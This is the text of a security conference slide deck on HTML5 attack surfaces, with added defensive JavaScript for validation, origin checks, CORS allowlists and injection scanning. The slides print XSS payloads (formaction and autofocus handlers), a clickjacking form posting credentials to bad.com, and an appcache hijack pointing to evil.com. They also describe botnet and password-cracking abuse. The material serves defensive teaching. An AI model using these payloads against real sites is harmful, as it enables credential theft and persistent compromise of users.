HTML5 a clear & present danger

Renaud Bidou
CTO
Securing & Accelerating Your Applications
7/17/2015
7/17/2015
Deny All © 2012
Deny All © 2013
1
1
Menu
1. HTML5 new capabilities
2. HTML5 tricks
3. Empowering common threats
4. Hackers’ dreams come true
What’s new with HTML5
HTML5 short history
• Project led by W3C
• Latest draft: HTML 5.1 – May 2, 2013
– Previous : December 17, 2012
– Previously : 13 drafts starting from January 22, 2008
• Why HTML5?
– Make HTML content natively dynamic
– Support offline mode
– Increase security control and tuning
– Improve internals for performance, task parallelization etc.
New HTML content
• On-the-fly graphics with the <canvas> tag
• Native MP3, Ogg and Wav audio format support with the <audio> tag
• Native MP4, WebM and Ogg video format support with the <video> tag
• Drag & Drop! with the draggable attribute and ondrop event handler
• Embedded geolocation with the new getCurrentPosition() method
Input Validation
• New input types through the <input type> attribute
– Email: type="email"
– URL: type="url"
– Numbers: type="number" type="range"
– Date: type="date" type="month" type="week"
• Embedded format validator
– Based on type attribute value
– Can be enforced through the pattern attribute
– Can be disabled… don’t try to understand…
<form novalidate>
New forms inputs
<input type="email">
<input type="url">
<input pattern="\d{4}" placeholder="4 digits PIN">
<input type="number" min="0" max="10" step="2" value="6">
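Because the embedded validator can be switched off with <form novalidate> (or skipped entirely by a hand-made request), the constraints the new input types express have to be checked again on the server. The following is an added example, not code from the slides: a Node-side re-check of the same four constraints shown above (email, url, a 4-digit PIN pattern, an even number between 0 and 10). The field names, limits and sample submissions are assumed values.

```javascript
// Added example (not from the slides): server-side re-validation of HTML5 input constraints.
// Same rules as the slide's inputs: email, url, 4-digit PIN, number 0..10 in steps of 2.
// Field names and limits are assumed values for the demonstration.
const FORM_RULES = {
  email: { type: 'email' },
  homepage: { type: 'url' },
  pin: { pattern: /^\d{4}$/ },
  level: { type: 'number', min: 0, max: 10, step: 2 },
};

function checkEmail(v) {
  // Deliberately simple: one '@', no whitespace, non-empty local and domain parts.
  return /^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(v);
}

function checkUrl(v) {
  // Parse with the WHATWG URL parser and only accept web schemes, so a
  // "javascript:" value that type="url" would let through is rejected here.
  try {
    const u = new URL(v);
    return u.protocol === 'http:' || u.protocol === 'https:';
  } catch {
    return false;
  }
}

function checkNumber(v, rule) {
  // Mirror min/max/step exactly as the <input type="number"> attributes express them.
  if (!/^-?\d+(\.\d+)?$/.test(v)) return false;
  const n = Number(v);
  if (rule.min !== undefined && n < rule.min) return false;
  if (rule.max !== undefined && n > rule.max) return false;
  if (rule.step !== undefined && (n - (rule.min ?? 0)) % rule.step !== 0) return false;
  return true;
}

// Returns the names of the fields that failed; an empty list means the submission is acceptable.
function validateSubmission(fields, rules = FORM_RULES) {
  const errors = [];
  for (const [name, rule] of Object.entries(rules)) {
    const v = fields[name];
    if (typeof v !== 'string') { errors.push(name); continue; }  // missing field counts as invalid
    let ok;
    if (rule.pattern) ok = rule.pattern.test(v);
    else if (rule.type === 'email') ok = checkEmail(v);
    else if (rule.type === 'url') ok = checkUrl(v);
    else if (rule.type === 'number') ok = checkNumber(v, rule);
    else ok = false;
    if (!ok) errors.push(name);
  }
  return errors;
}

// Constructed submissions: one as the browser's validator would let through, one as a
// client that disabled or bypassed the HTML5 validator might send.
const GOOD_SUBMISSION = { email: 'alice@example.org', homepage: 'https://example.org', pin: '1234', level: '6' };
const BAD_SUBMISSION = { email: 'not an email', homepage: 'javascript:alert(1)', pin: '12a4', level: '7' };

console.log('good:', validateSubmission(GOOD_SUBMISSION));  // []
console.log('bad :', validateSubmission(BAD_SUBMISSION));   // all four field names
```

The point of keeping the rules in one table is that the HTML attributes and the server check are derived from the same source, so the two cannot silently drift apart.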
New HTML internals
• Web Workers enable JavaScript background processing
• Web Storage improves local storage to extend the cookie concept and natively support session-based data handling
• WebApp Cache to enable offline mode of Web/Cloud based applications
• Server Sent Events (SSE) enables Server to Client communication through the established connection
HTML5 new security tricks
iFrame Sandboxing
• iFrame sandboxing
– forbids forms, scripts, popups, access to cookies, local storage
– considers the content as being provided by another domain
• iFrame sandboxes are not set by default
– Backward compatibility
– sandbox attribute to be explicitly set without value
<iframe src="iframe-source.html" sandbox="">
Not natural at all
Cross-document messaging
• Cross-document messaging
– provides a mechanism for iframes to communicate with the parent document
– overrides HTML4 restrictions
• Implementation failure
– Parent frame to control sources of messages
– Rarely (never) performed
– Origin iframe identification not even enforced
window.parent.postMessage('hello', '*');
(callout on the second argument: Origin iFrame ID. Wildcards are valid & Recommended)
iFrame insecurity
• Sandboxes are not applied
– iFrames provide access to local storage
– iFrames allow script execution and forms
• Thanks to cross-document messaging
– iFrames communicate with the parent window
→ HTML5 opens doors between iframes and parents
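The two slides above describe the failure (no origin check on the parent side, a wildcard target on the child side). As an added example, not code from the slides, here is what the opposite looks like: a parent page that accepts messages only from the origin of the iframe it embeds, validates the payload shape even then, and a child that refuses to post to the '*' wildcard. The origins and the "resize" message type are assumed values; the sample events are constructed objects with the shape of a MessageEvent, so the decision logic can be run outside a browser.

```javascript
// Added example (not from the slides): origin-checked cross-document messaging.
// 'https://widgets.example' is an assumed value for the origin of the embedded iframe.
const TRUSTED_CHILD_ORIGIN = 'https://widgets.example';

// event.origin is filled in by the browser from the sender's document origin; the
// sending script cannot forge it, so it is the one field worth checking.
function isTrustedOrigin(origin, trustedOrigins) {
  return typeof origin === 'string' && trustedOrigins.includes(origin);
}

// Returns a decision instead of acting on the DOM, so it can be exercised under Node.
function handleMessage(event, trustedOrigins = [TRUSTED_CHILD_ORIGIN]) {
  if (!isTrustedOrigin(event.origin, trustedOrigins)) {
    return { accepted: false, reason: 'untrusted origin ' + String(event.origin) };
  }
  // A trusted frame may itself be compromised (XSS), so the payload is still untrusted:
  // check its shape and bounds, and never eval() it or write it with innerHTML.
  const data = event.data;
  if (data === null || typeof data !== 'object' || typeof data.type !== 'string') {
    return { accepted: false, reason: 'malformed payload' };
  }
  if (data.type === 'resize' && Number.isInteger(data.height) && data.height > 0 && data.height <= 2000) {
    return { accepted: true, action: 'resize', height: data.height };
  }
  return { accepted: false, reason: 'unknown message type ' + data.type };
}

// Child side: name the exact parent origin. With '*', a page that is not the expected
// parent (the frame embedded on another site) would receive the message too.
function postToParent(parentWindow, payload, parentOrigin) {
  if (parentOrigin === '*') {
    throw new Error('refusing to post with wildcard targetOrigin');
  }
  parentWindow.postMessage(payload, parentOrigin);
  return parentOrigin;
}

// Browser wiring on the parent page (a no-op under Node).
if (typeof window !== 'undefined' && typeof window.addEventListener === 'function') {
  window.addEventListener('message', (ev) => {
    const decision = handleMessage(ev);
    if (decision.accepted && decision.action === 'resize') {
      document.getElementById('widget').style.height = decision.height + 'px';
    }
  });
}

// Constructed sample events (MessageEvent-shaped objects, not real browser events).
const SAMPLE_TRUSTED = { origin: 'https://widgets.example', data: { type: 'resize', height: 300 } };
const SAMPLE_FORGED = { origin: 'https://attacker.example', data: { type: 'resize', height: 300 } };

// A fake parent window that records what was posted, for demonstration outside a browser.
function makeRecordingWindow() {
  const sent = [];
  return { sent, postMessage: (payload, origin) => sent.push({ payload, origin }) };
}

console.log(handleMessage(SAMPLE_TRUSTED));  // accepted: true, action: 'resize', height: 300
console.log(handleMessage(SAMPLE_FORGED));   // accepted: false, untrusted origin
```

Note that the origin check does not replace the sandbox attribute: one limits who may talk to the parent, the other limits what the frame may do on its own.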
CORS
• Cross-Origin Resource Sharing
• Required for « modern » applications
• Browsers handle content coming from 3rd party domains
[Diagram: an HTML5 powered browser (1) loads the main page from Site A and (2) requests 3rd party content from Site B]
CORS tricky concept
• CORS « security » controls
[Diagram: browser, Site A, Site B]
1. Browser → Site A
GET / HTTP/1.1
Host: Site_A
Site A → Browser
HTTP/1.1 200 OK
2. Browser → Site B
GET /content.htm HTTP/1.1
Host: Site_B
Origin: http://Site_A
Site B → Browser
HTTP/1.1 200 OK
Access-Control-Allow-Origin: http://Site_A
• rely on
– Origin and Access-Control-Allow-Origin headers
– Relevant access control implemented on server
– Client ↔ Server trust relationship ??????????????
CORS Security Issues
• Access control
– No implementation standard
– Often set at site level through includes or left universal
Access-Control-Allow-Origin: *
→ No reliable access control on server
• Preflighted requests
– Inform about supported methods
– Define the security policy set on the browser
– Responses are cached on the client
→ Browsers will not update their security policy
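The two issues above (a universal Access-Control-Allow-Origin and preflight answers cached by the browser) are both server-side decisions. As an added example, not code from the slides, here is the weak setting next to a hardened one: an exact-match origin allowlist, no CORS header at all for unknown origins, Vary: Origin for shared caches, and a short Access-Control-Max-Age so a policy change reaches browsers instead of being served from their cache. The origins and the method list are assumed values.

```javascript
// Added example (not from the slides): CORS headers from an explicit origin allowlist.
// The origins below are assumed values.
const ALLOWED_ORIGINS = new Set(['https://app.example', 'https://admin.example']);

// Weak setting from the slide: every origin may read the response. Because browsers
// refuse '*' together with credentials, sites often "fix" this by echoing the request
// Origin blindly, which grants the same universal access.
function weakCorsHeaders() {
  return { 'Access-Control-Allow-Origin': '*' };
}

// Hardened setting: exact match against the allowlist (no prefix or suffix matching),
// no Access-Control-Allow-Origin at all for unknown origins (the browser then blocks
// the read), and Vary: Origin so a cache never serves one origin's answer to another.
function corsHeaders(requestOrigin, allowed = ALLOWED_ORIGINS) {
  const headers = { Vary: 'Origin' };
  if (typeof requestOrigin !== 'string' || !allowed.has(requestOrigin)) {
    return headers;
  }
  headers['Access-Control-Allow-Origin'] = requestOrigin;
  headers['Access-Control-Allow-Credentials'] = 'true';
  return headers;
}

// Preflight answer: only the methods and headers the endpoint really accepts, and a
// short Max-Age (seconds) so the browser re-asks soon after the policy changes.
function preflightHeaders(requestOrigin, allowed = ALLOWED_ORIGINS) {
  const headers = corsHeaders(requestOrigin, allowed);
  if (!headers['Access-Control-Allow-Origin']) return headers;
  headers['Access-Control-Allow-Methods'] = 'GET, POST';
  headers['Access-Control-Allow-Headers'] = 'Content-Type';
  headers['Access-Control-Max-Age'] = '60';
  return headers;
}

// Minimal Node http server using the functions above. It only starts when the
// environment variable CORS_DEMO=1 is set, so importing this file has no side effect.
if (typeof process !== 'undefined' && process.env.CORS_DEMO === '1' && typeof require === 'function') {
  const http = require('http');
  http.createServer((req, res) => {
    const origin = req.headers.origin;
    const isPreflight = req.method === 'OPTIONS';
    res.writeHead(isPreflight ? 204 : 200, isPreflight ? preflightHeaders(origin) : corsHeaders(origin));
    res.end(isPreflight ? '' : '{"ok":true}');
  }).listen(8080);
}

console.log(corsHeaders('https://app.example'));    // allowed: header echoes the exact origin
console.log(corsHeaders('https://attacker.example')); // unknown: only Vary: Origin
```

The allowlist lives next to the handler on purpose: the slide's complaint is that the policy is usually set once in an include and forgotten, so keeping it visible where the response is built makes the rule reviewable.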
The Gig
1. CORS obsoletes SOP
2. iFrames are out of control
→ Browsers are turned into proxies
– « Native » browsing on internal networks
– Powerful DoS capabilities
– Accurate network (IP, port) scan behind the firewall
– Etc.
Empowering usual attacks
Injections heaven
• 31 new HTML5 tags
– 31 new injection vectors supported by browsers
<audio> <canvas> <command> <embed> <nav> <param> <source> <ruby> <track> <video> …
• 52 + 1 new HTML5 script event handlers
– 52 on* injection points
– + formaction: will bypass on\w+= like filters
<form id="test" />
<button form="test" formaction="javascript:alert(1)">
→ Thousands of new evasion combinations
Attributes you will love
• Self-triggering execution through autofocus
<input type="text" value="" onfocus="alert(1)" autofocus>
– Can be efficiently combined with appropriate handlers
<body onscroll=alert(1)>
<br><br><br><br><br><br>...<br><br><br>
<input autofocus>
• Stealth user abuses with dirname
– Overwrite user input
<form action="" method="post">
<input name="username" value="admin" />
<input name="password" type="password" value="secret" />
<input name="captcha" value="" dirname="password"/>
<input type="submit">
</form>
Submitted body: username=admin&password=ltr&captcha=
Drag&Drop Jacking
• Abusing the D&D API
– Have a user drag & drop something
• Image, text, browser element (scrollbar, slider etc.)
– Set the value of the dragged element to whatever you want
• Malicious data to be submitted on behalf of the user
• Confidential data to be stolen
– Have an invisible element follow the mouse
– Set the ondrop event handler of the iFrame to whatever …
• Feed form content (with malicious data): CSRF
• Send content (stolen data) to a 3rd party: Cross-domain data leak
→ Bypasses cross-domain & CSRF protections
S’more Clickjacking
• External form content definition
– Thanks to the form & formaction attributes
<form id='auth' action='/login'>
<input type='text' placeholder='login'>
<br><input type='password' placeholder='password'>
<br><input type='submit' value='Enter'>
</form>
<input form='auth' type='submit' value='Enter HERE' formaction='http://bad.com/thanks'>
– Can also be used to bypass CSRF protections
– Not that subtle, but still smarter than average users…
→ Trivial data theft & CSRF protections bypass
XSS Unleashed
• Screenshots with XSS
– Thanks to the <canvas> tag…
[Diagram: Hacker, Relay, Victim Browser, Vulnerable App]
1. Hacker exploits XSS vulnerability
2. Malicious Javascript is loaded on Victim
3. Victim executes Javascript
4. Victim sends screenshot
5. Hacker retrieves screenshot
BotnetNG
• Bi-directional communication channel
– Server-Sent Events to change web-based botnets’ behaviour
• Past:
– Agent regularly connects to the C&C channel:
• to get commands and provide output
• « Easy » to identify and sign
– Threat is in → out
• Efficiently addressed with outgoing proxies
• Now:
– No recurring connections to the C&C channel
• Commands sent by server / responses sent asynchronously
• No standard behaviour to model
– Threat is out → in
• Not addressed by web client security devices
→ Botnet prevention mechanisms are obsolete
HTML5 Inside
Password cracking
• A botnet case study
– Targets clients connected to the compromised application
– Used to crack passwords
• Takes advantage of Web Workers
– Browsers compute hashes in the background
– Invisible to the user, no impact on browser performance
• Just theory?
– Ravan, Distributed JS Computing System
– Supports MD5 and SHA hashes
– Simply a PoC, users are asked for permission
→ Web hackers’ version of distributed computing
Dream comes True
• Issues with injections
– Volatile: limited timeframe
– Persistent: can be removed from the compromised DB
• The Hacker’s dream
– Persistent injections for an unlimited timeframe
– Client-side persistency to prevent one-shot removal
• WebApp cache: HTML5 gift to the underground
– local HTML5 storage
– Independent from the browser cache
• Not so easy to clean, whenever possible
– Prevents any request from the client
– Allows caching anything, including the root of the application
WebApp Cache
• Browser requests a page
GET / HTTP/1.1
<!DOCTYPE HTML>
<html manifest="site.appcache">
…
</html>
(callout on the manifest attribute: Manifest file URL)
• Browser gets the Manifest file
– Specifies pages to be locally cached
– Some more stuff
• Browser stores the files
– Never to be requested again
The Ultimate APT
• One scenario
– Exploit a client-side injection vulnerability on a server (XSS)
• Can be volatile, will be used just once
– Have the client browser execute something like
document.getElementsByTagName("html")[0].setAttribute("manifest","http://evil.com/bad.manifest");
(callout: changes the manifest attribute to the attacker-controlled URL)
– Set an entry in the corrupted manifest file to a corrupted file
• with « alternate » capabilities such as phishing or drive-by download
→ Client access to the application compromised forever
Conclusion
→ HTML5 opens doors between iframes and parents
→ Browsers are turned into proxies
→ Thousands of new evasion combinations
Preventing HTML5 abuses
• Identify new HTML5 content
– Tags, attributes, event handlers
• Identify previously defined HTML5 content
– Now removed from recent drafts
– Still supported by browsers
• Evaluate suspicious combinations
– Tag name + attribute + event handler
• Efficiently identify script injections
– Don’t try to understand (you can’t)
– Identify the nature of data submitted to your application
• Enforce access restrictions
– In the core of applications for Cross-Document Messaging
– At the server level for CORS security
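The first four points above amount to one review step: look at what tag, attribute and event-handler combinations arrive in user-submitted markup, without trying to interpret the payload. As an added example, not code from the slides, here is a heuristic scanner that flags the combinations the talk lists in the "Injections heaven", "Attributes you will love", "S’more Clickjacking" and "The Ultimate APT" slides: on* handlers, formaction, a form attribute pointing outside its form, dirname, autofocus, the manifest attribute, and javascript: URLs in any attribute. The tag list is the partial one quoted on the slide; the tokenizer is a deliberately simple regex, and the samples are constructed from the slides’ own payload shapes.

```javascript
// Added example (not from the slides): heuristic scanner for HTML5 injection vectors.
// It is a review aid for submitted markup, not a sanitizer, and makes no attempt to
// "understand" the payload: it reports which combinations are present.

// Attributes introduced or made dangerous by HTML5 that should not appear in user content.
const SUSPICIOUS_ATTRS = new Set(['formaction', 'form', 'dirname', 'autofocus', 'manifest', 'srcdoc']);
// New HTML5 tags quoted on the slide (partial list; extend with the full set of 31).
const HTML5_TAGS = new Set(['audio', 'canvas', 'command', 'embed', 'nav', 'param', 'source', 'ruby', 'track', 'video']);

// Crude tag/attribute tokenizer. It does not handle a '>' inside a quoted attribute
// value or malformed markup; that is accepted here because the output is for review,
// and anything the tokenizer cannot parse is itself a reason to reject the input.
function tokenizeTags(html) {
  const tags = [];
  const tagRe = /<([a-zA-Z][\w-]*)([^>]*)>/g;
  const attrRe = /([^\s=\/>]+)(?:\s*=\s*("[^"]*"|'[^']*'|[^\s>]+))?/g;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = {};
    for (const a of m[2].matchAll(attrRe)) {
      const value = a[2] === undefined ? '' : a[2].replace(/^["']|["']$/g, '');
      attrs[a[1].toLowerCase()] = value;
    }
    tags.push({ name: m[1].toLowerCase(), attrs });
  }
  return tags;
}

// Returns one finding per suspicious tag, attribute or value; an empty list means
// nothing on the HTML5 watch-list was seen (it does not mean the markup is safe).
function scanHtml(html) {
  const findings = [];
  for (const tag of tokenizeTags(html)) {
    if (HTML5_TAGS.has(tag.name)) findings.push({ tag: tag.name, attr: null, reason: 'html5 tag' });
    for (const [attr, value] of Object.entries(tag.attrs)) {
      if (/^on\w+$/.test(attr)) findings.push({ tag: tag.name, attr, reason: 'event handler' });
      else if (SUSPICIOUS_ATTRS.has(attr)) findings.push({ tag: tag.name, attr, reason: 'html5 attribute' });
      if (/^\s*javascript:/i.test(value)) findings.push({ tag: tag.name, attr, reason: 'javascript: URL' });
    }
  }
  return findings;
}

// Constructed samples built from the payload shapes shown on the slides.
const SAMPLES = {
  formaction: '<form id="test" /><button form="test" formaction="javascript:alert(1)">',
  autofocus: '<input type="text" value="" onfocus="alert(1)" autofocus>',
  dirname: '<input name="captcha" value="" dirname="password"/>',
  manifest: '<html manifest="http://evil.com/bad.manifest">',
  benign: '<p class="note">Hello <b>world</b></p>',
};

for (const [name, html] of Object.entries(SAMPLES)) {
  console.log(name, scanHtml(html));
}
```

Used as a gate in front of a content store, the useful output is the count of findings per submission, not the payload itself: a non-zero count on a field that should hold plain text is the signal the slide calls "the nature of data submitted to your application".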
Thank you!
[email protected]
+33 1 46 20 96 00